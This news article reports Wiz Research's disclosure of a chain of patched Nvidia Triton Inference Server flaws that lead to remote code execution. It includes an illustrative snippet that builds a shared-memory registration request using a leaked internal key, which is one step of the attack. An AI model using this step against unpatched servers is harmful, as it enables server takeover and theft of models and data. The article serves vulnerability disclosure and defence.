Security researchers have lifted the lid on a chain of high-severity vulnerabilities that could lead to remote code execution (RCE) on Nvidia's Triton Inference Server.

Wiz Research said that if the three vulnerabilities it discovered and reported to Nvidia were exploited successfully, the potential consequences could include AI model theft, sensitive data breaches, manipulation of AI model responses, and lateral movement into other areas of the network.

Nvidia has now patched the bugs affecting Triton Inference Server, an open source platform for running AI models and serving them to user-facing apps. Triton Inference Server was designed by Nvidia to be able to run models from any major AI framework, and it does this using different backends, each of which is dedicated to a specific framework.

Triton's Python backend, however, is also relied upon by backends for frameworks other than Python itself, making it one of the most versatile components the server supports.

This wider reliance on the Python backend means that any security weakness found there could significantly increase the number of organizations affected.

The first vulnerability (CVE-2025-23320, CVSS 7.5) relates to a bug in the Python backend, triggered by sending a very large request that exceeds the shared memory limit. This produces an error message that reveals, in full, the unique name (key) of the backend's internal IPC shared memory region.
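The leak itself follows a common anti-pattern: interpolating an internal identifier into a client-facing error message. A simplified illustration of the idea (not Triton's actual code; the key name and limit below are hypothetical):

```python
# Illustrative only -- not Triton source code.
# Anti-pattern: a private identifier leaks into a client-facing error.
INTERNAL_SHM_KEY = "internal_ipc_region_1234"   # hypothetical internal region name
SHM_LIMIT = 64 * 1024 * 1024                    # hypothetical 64 MiB limit

def handle_request(payload_size: int) -> str:
    if payload_size > SHM_LIMIT:
        # Verbose error: reveals the private region name to any caller
        # who sends an oversized request.
        return f"error: request exceeds capacity of region '{INTERNAL_SHM_KEY}'"
    return "ok"

# A safer message would omit the key entirely, e.g.:
#   "error: request exceeds shared memory capacity"
```

Once an attacker can provoke that error, the otherwise-secret region name is theirs to reuse.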

Armed with that leaked region name, attackers can combine it with Triton's public shared memory API to take control of a Triton Inference Server.

An attacker can take advantage of this API's sub-par validation to exploit out-of-bounds write and read bugs CVE-2025-23319 (CVSS 8.1) and CVE-2025-23334 (CVSS 5.9) respectively.

Because the API fails to check whether the attacker-supplied key (the unique shared memory name) corresponds to a legitimate user-owned region or a private internal one, Triton will accept the attacker's request to its registration endpoint, allowing them to read from and write to that region.
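Triton's system shared memory extension exposes a registration endpoint of the form `POST /v2/systemsharedmemory/region/{name}/register`, whose JSON body names the underlying shared memory key, an offset, and a byte size. A minimal sketch of how such a request is built, with a hypothetical leaked key standing in for the value recovered from the verbose error:

```python
import json

# Hypothetical value -- in the attack, this comes from the leaked error message.
leaked_key = "internal_ipc_region_1234"

def build_register_request(region_name: str, shm_key: str, byte_size: int):
    """Build the URL path and JSON body for Triton's system shared memory
    registration endpoint (KServe protocol extension)."""
    url = f"/v2/systemsharedmemory/region/{region_name}/register"
    body = {"key": shm_key, "offset": 0, "byte_size": byte_size}
    return url, json.dumps(body)

# Registering the backend's private region under an attacker-chosen name:
url, body = build_register_request("attacker_region", leaked_key, 1 << 20)
```

Because nothing in the original validation distinguished a user-owned key from a private internal one, a request like this was enough to hand the caller read/write access to the backend's own IPC region.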

With the ability to manipulate the backend's shared memory, attackers can gain full control of the server.

Wiz did not say whether the bug chain had been exploited in the wild, adding that it would refrain from publishing further details at this time.

"This research demonstrates how a series of seemingly minor flaws can be chained together to create a significant exploit," said the team behind the findings. "A verbose error message in a single component [and] a feature that can be misused in the main server were all it took to create a path to potential system compromise. 

"As companies deploy AI and ML more widely, securing the underlying infrastructure is paramount. This discovery highlights the importance of defense-in-depth, where security is considered at every layer of an application."

Nvidia confirmed that all three security flaws were patched in version 25.07, released on August 4; all prior versions are vulnerable.

The Wiz team said: "We would like to thank the Nvidia security team for their excellent collaboration and swift response.

"We strongly recommend all Triton Inference Server users update to the latest version."

Triton has been used for several years by organizations of various sizes, although Nvidia launched Dynamo earlier this year, positioning it as Triton's successor.